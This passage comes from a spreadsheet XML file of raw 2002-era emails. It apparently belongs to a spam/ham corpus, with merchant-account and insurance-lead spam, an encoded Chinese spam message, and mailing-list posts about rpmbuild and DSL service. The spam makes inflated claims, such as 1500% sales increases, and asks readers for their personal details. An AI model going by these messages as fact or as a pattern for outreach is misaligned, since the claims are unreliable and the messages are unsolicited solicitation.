 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Visa ~ MasterCard ~ American Express ~ Etc. [6gho10]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Increase your revenues  by accepting Credit Cards and Checks!
 Visa ~ MasterCard ~ American Express   ~ Check Guarantee   ~ Electronic Internet checks
 Increase Sales w/4 Powerful Words !!!
 We Accept Credit Cards
 Today, the world of E-business is moving faster everyday. And your customers expect every payment option, or they may take their business elsewhere. And that means lost sales! IF YOU SELL A PRODUCT OR SERVICE YOU NEED A MERCHANT ACCOUNT! Some Internet merchants have seen sales increases as high as 1500%! Offering a wide variety of easy payment options for your customers increases impulse buying and helps sell expensive items.
 Complete E-COMMERCE solutions to accept VISA, MasterCard, American Express and Checks for your website, online store, traditional storefront or home based business.
 for more information please visit our FAQ
 http://members.tripod.co.uk/hhs888
 ========================
 Or Submit Your Information Via Email
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ========================
 Thank you 
 To be removed type remove in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ֻϢ¿ͶϢȺ
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --#MYBOUNDARY#
 Content-Type: text/html; charset=GB2312
 Content-Transfer-Encoding: base64
 X-MIME-Autoconverted: from 8bit to base64 by hq.pro-ns.net id g6MG9khX090283
 PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5VbnRpdGxlZCBEb2N1bWVudDwvdGl0bGU+DQo8bWV0
 YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNl
 dD1nYjIzMTIiPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5ib2R5IHsgIGxp
 bmUtaGVpZ2h0OiAyMnB4OyBmb250LXNpemU6IDE0cHh9DQotLT4NCjwvc3R5bGU+DQo8L2hl
 YWQ+DQo8YnI+DQo8dGFibGUgd2lkdGg9IjczJSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0i
 MCIgY2VsbHBhZGRpbmc9IjAiIGFsaWduPSJjZW50ZXIiIGhlaWdodD0iMzk5Ij4NCiAgPHRy
 PiANCiAgICA8dGQgYWxpZ249ImNlbnRlciIgaGVpZ2h0PSIxNyI+Jm5ic3A7PC90ZD4NCiAg
 PC90cj4NCiAgPHRyPiANCiAgICA8dGQgY2xhc3M9ImJvZHkiIGhlaWdodD0iMzk0Ij4gPGZv
 bnQgY29sb3I9IiMzMzMzMzMiPiZuYnNwOyZuYnNwOzwvZm9udD4gDQogICAgICA8cD48Zm9u
 dCBjb2xvcj0iIzMzMzMzMyI+PGI+PGZvbnQgY29sb3I9IiMzMzMzMzMiPjxiPjxmb250IGNv
 bG9yPSIjMzMzMzMzIj48Yj48Zm9udCBjb2xvcj0iIzMzMzMzMyI+PGI+PGZvbnQgY29sb3I9
 IiMzMzMzMzMiPjxiPjxmb250IGNvbG9yPSIjMzMzMzMzIj48Yj48Zm9udCBjb2xvcj0iIzMz
 MzMzMyI+PGI+PGZvbnQgY29sb3I9IiMzMzMzMzMiPjxiPjxmb250IGNvbG9yPSIjMzMzMzMz
 Ij48Yj48L2I+PC9mb250PjwvYj48L2ZvbnQ+PC9iPjwvZm9udD48L2I+PC9mb250PjwvYj48
 L2ZvbnQ+PC9iPjwvZm9udD48L2I+PC9mb250PjwvYj48L2ZvbnQ+PC9iPjwvZm9udD65qSAN
 CiAgICAgICAgyta7+rbM0MXPorD81MK/qLrNtszQxc+iyLq3osjtvP6hozwvcD4NCiAgICAg
 IDxwPjEuIEHA4LbM0MWw/NTCv6ijurD81MK30TIwMDDUqqGjv8nS1Nans9a2zNDFzagyNNCh
 yrHBrND4sru2z7eiy822zNDFz6KjrM7exrW0zs/e1sajrMjVt6LLzcG/1NoxzfLM9dLUyc+h
 ozxicj4NCiAgICAgICAgMi4gQsDgtszQxbD81MK/qKO6sPzUwrfRNTAw1Kqho8jVt6LLzcG/
 zqozMDAwzPXX89PSoaO0y7+o09DGtbTOz97WxqGjt6LLzdK70KHKsbrz0qrNo7Dr0KHKsdTZ
 t6LLzaGjPGJyPg0KICAgICAgICDXoqO60tTJz7eiy83Bv9Kq1Nq2zNDFzai1yLbM0MXIurei
 yO28/tans9bPwrLFxNy077W9tcSho9LUyc/BvcDgv6jOqtLGtq+2zNDFv6ijrLbUt6LN+dLG
 tq/K1rv608O7p7XEtszQxc+isPzUwqOsttS3orj4warNqNPDu6e1xLbM0MXPorrNzai7sMv5
 svrJ+rXEt9HTw7K7sPzUwqGjw7/Vxb+o0OjRur3wMjAw1Kqhozxicj4NCiAgICAgICAgMy4g
 uam2zNDFz6LIureiyO28/qOttszQxc2oo7q/yc/y1ri2qLXYx/i1xMv509DK1rv608O7p7ei
 y822zNDFz6KjrMjtvP7E2rTmyKu5+rj3tdjK1rv6usXC67bOo6y/ydfUtqjK1rv6usXC67XE
 xKnOu7rFt6LLzaOs0rK/ydfUseDK1rv6usXC67K+vfjQ0Leiy82hozwvcD4NCiAgICAgIDxw
 PsGqz7W157uwo7owNTc0o602NTc2MjQ3NCC0q9Xmo7owNTc0o602NTc2MzMwMiDK1rv6o7ox
 MzAwODk4OTA4MDxicj4NCiAgICAgICAgwaogz7UgyMujutDsz8jJ+jxicj4NCiAgICAgICAg
 u+O/7rWlzrujutXjva0gz/PJvSDTytX+vtYgPGJyPg0KICAgICAgICC/qiAmbmJzcDu7p6O6
 z/PJvbmkyczS+NDQINXKusWjujM5MDEzNDAwMDkwMDAwNTU4MjI8YnI+DQogICAgICA8L3A+
 DQogICAgICA8cD48YnI+DQogICAgICA8L3A+DQogICAgPC90ZD4NCiAgPC90cj4NCiAgPHRy
 PiANCiAgICA8dGQ+Jm5ic3A7PC90ZD4NCiAgPC90cj4NCjwvdGFibGU+DQo8YnI+DQo8L2Jv
 ZHk+DQo8L2h0bWw+DQoNCg0K
 --#MYBOUNDARY#--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</si>
  <si>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Fresh, Crisp Leads from Allmerica Financial
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_C7975_01C23675.9DAF2550
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  If Your Broker Dealer Isn't Giving You Fresh, Crisp, New Leads...
  Fire Them and Hire Us
  Allmerica Financial: A System for Success	
  Lead Generation	
 	Through established sponsored market programs with CPA firms,
 banks, credit unions and property and casualty firms, you'll receive the
 kind of leads you need to grow your client base and meet their long-term
 financial needs. 
  Marketing &amp; Business Planning	
 	Allmerica experts will help you map a strategy for selecting and
 penetrating the right market or markets to grow your practice. We'll
 also give you the on-going support to make sure that you stay on-target.
  Client &amp; Advisor Services	
 	Allmerica gives you an edge by providing you with web-based new
 business technology and customer service programs designed for
 responsiveness and convenience. 
  On-Going Local Support	
 	Your local office will provide proven, innovative marketing and
 sales support programs brought to you by your field-based associates.
 Investment Products and Services 	
  	Brokerage services	  	Private money managers	 
  	Individual securities	  	Automatic account rebalancing
  	Mutual funds	  	Individual retirement accounts	 
  	Proprietary and non-proprietary variable and fixed annuities
 Asset allocation models and investment planning	 
  	Wrap programs 	 	529 Plans	 
 Other Personal Financial Services 	
  	Financial planning 	 	Tax planning	 
  	Retirement planning 	 	Comprehensive planning software
  	Education planning 	 	Risk management &amp; insurance
 planning	 
  	Estate planning 	 	 
 Business Services 	
  	Business planning 	 	Business insurance: buy-sell,
 key-person	 
  	Business continuation 	 	Executive compensation 	
  	Qualified plans: pensions, profit-sharing, 401K	  	Group
 insurance: life, disability, medical, etc.	 
  800-846-8395	
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 02-0977
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_C7975_01C23675.9DAF2550
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Fresh, Crisp Leads from Allmerica Financial&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#CCCCCC" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;
   &lt;table width=3D"556" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#FFFFFF" bgcolor=3D"#FFFFFF"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" =
 cellpadding=3D"0" height=3D"403" bordercolor=3D"#000099" =
 bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;
                     &lt;img =
 src=3D"http://iiq.us/images/allmerica/header.gif" width=3D"550" =
 height=3D"75" alt=3D"If Your Broker Dealer Isn't Giving You Fresh, =
 Crisp, New Leads..."&gt;&lt;br&gt;
                     &lt;img =
 src=3D"http://iiq.us/images/allmerica/image.jpg" width=3D"550" =
 height=3D"164" alt=3D'Fire Them and Hire Us'&gt;&lt;br&gt;
                     &lt;img src=3D"http://iiq.us/images/allmerica/tag.gif" =
 width=3D"550" height=3D"36" alt=3D'Allmerica Financial: A System for =
 Success'&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/lead.gif" width=3D"262" =
 height=3D"36" alt=3D'Lead Generation'&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;blockquote&gt;=20
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Through=20
                         established sponsored market programs with CPA =
 firms,=20
                         banks, credit unions and property and casualty =
 firms,=20
                         you'll receive the kind of leads you need to =
 grow your=20
                         client base and meet their long-term financial =
 needs.=20
                         &lt;/font&gt;&lt;/p&gt;
                     &lt;/blockquote&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/market.gif" width=3D"477" =
 height=3D"33" alt=3D'Marketing &amp; Business Planning'&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;blockquote&gt;=20
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Allmerica=20
                         experts will help you map a strategy for =
 selecting and=20
                         penetrating the right market or markets to grow =
 your practice.=20
                         We'll also give you the on-going support to make =
 sure=20
                         that you stay on-target.&lt;/font&gt;&lt;/p&gt;
                     &lt;/blockquote&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/client.gif" width=3D"397" =
 height=3D"36" alt=3D'Client &amp; Advisor Services'&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;blockquote&gt;=20
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Allmerica=20
                         gives you an edge by providing you with =
 web-based new=20
                         business technology and customer service =
 programs designed=20
                         for responsiveness and convenience. &lt;/font&gt;&lt;/p&gt;
                     &lt;/blockquote&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img src=3D"http://iiq.us/images/allmerica/on.gif" =
 width=3D"550" height=3D"32" alt=3D'On-Going Local Support'&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;blockquote&gt;=20
                       &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;Your=20
                         local office will provide proven, innovative =
 marketing=20
                         and sales support programs brought to you by =
 your field-based=20
                         associates.&lt;/font&gt;&lt;/p&gt;
                     &lt;/blockquote&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"4" bordercolor=3D"#000000"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#000099" align=3D"center"&gt;
               &lt;font size=3D"3" face=3D"Verdana, Arial, Helvetica, =
 sans-serif" color=3D"#FFFFFF"&gt;&lt;b&gt;=20
                 Investment Products and Services&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"2"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Brokerage services&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Private money managers&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Individual securities&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Automatic account rebalancing&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Mutual funds&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Individual retirement accounts&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Proprietary and non-proprietary variable and =
 fixed annuities&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Asset allocation models and investment =
 planning&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Wrap programs &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;529 Plans&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"556" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"4" bordercolor=3D"#000000"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#000099" align=3D"center"&gt;
               &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;
                 Other Personal Financial Services&lt;/font&gt;&lt;/b&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"2"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Financial planning &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Tax planning&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Retirement planning &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Comprehensive planning software&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Education planning &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Risk management &amp;amp; insurance =
 planning&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Estate planning &lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=3D"2"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"556" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"4" bordercolor=3D"#000000"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#000099" align=3D"center"&gt;
               &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;
                 Business Services &lt;/font&gt;&lt;/b&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"2"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Business planning &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Business insurance: buy-sell, =
 key-person&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Business continuation &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Executive compensation &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"53" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"221"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Qualified plans: pensions, profit-sharing, =
 401K&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"19" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/allmerica/bullet.gif" width=3D"18" =
 height=3D"19"&gt;&lt;/td&gt;
             &lt;td width=3D"257"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Group insurance: life, disability, medical, =
 etc.&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/allmerica/phone.gif" =
 width=3D"556" height=3D"79" alt=3D'800-846-8395'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FF9933"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;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value=3D"jaoliver@allmerica.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Allmerica Ad Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"556" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;02-0977&lt;/font&gt;&lt;font face=3D"Verdana, =
 Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;br&gt;
                 We don't want anybody to receive our mailing who does =
 not wish=20
                 to receive them. This is a professional communication =
 sent to=20
                 insurance professionals. To be removed from this mailing =
 list,=20
                 DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_C7975_01C23675.9DAF2550--
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ralf wrote :
 &gt; Skipping all RPM build parts except for the actual packing is not
 &gt; possible
 Actually it is (sort of).
 To answer partly the original question, this might have been useful once
 the %files error was corrected :
 rpmbuild -bi --short-circuit &lt;specfile&gt;
 This will skip all the way to the %install and start from there. Of course,
 you need to have already done everything else before, and this will _not_
 produce any rpm files, but will at least tell you if everything is now able
 to finish successfully.
 Sure, it's not perfect since if the %files error was actually because
 entries were missing you'll notice it only once the package is really
 installed. But for multiple typos in the %files section (like when you're
 writing a spec file after 2AM ;-)) it can come in handy :-)
 It's also very useful if you need to override some Makefile variables
 during install, when the simple cases like "%makeinstall" or "make install
 DESTDIR=%{buildroot}" don't work. It keeps you from redoing all the
 unpacking and building processes.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</si>
  <si>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On Thu, 2002-08-15 at 17:53, Jesse wrote:
 &gt; 
 &gt; On Thu, Aug 15, 2002 at 05:46:55PM -0400, Luis Villa wrote:
 &gt; &gt; FWIW, slummerville actually has the internet- not just broadband, but
 &gt; &gt; actual broadband competition, which I gather is rare. I had ADSL and two
 &gt; &gt; cable options when I moved in.
 &gt; 
 &gt; 
 &gt; Did you actually attempt to order the DSL? Large chunks of somerville have
 &gt; advertised DSL service that can't actually be obtained. Excuses vary, from
 &gt; "no available copper" to "full DSLAM", but the folks I know who've wanted
 &gt; DSL around here have all failed, ending up either with ATTBB, RCN or an
 &gt; honest-to-god T1.
 No. My past experiences with DSL have generally been miserable so I went
 with at&amp;t digital cable[1] + cable modem. Still, even the hypothetical
 option was a lot better than what I had in the theoretically
 tech-friendly Triangle in NC.
 Luis
 [1]sports junkie
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
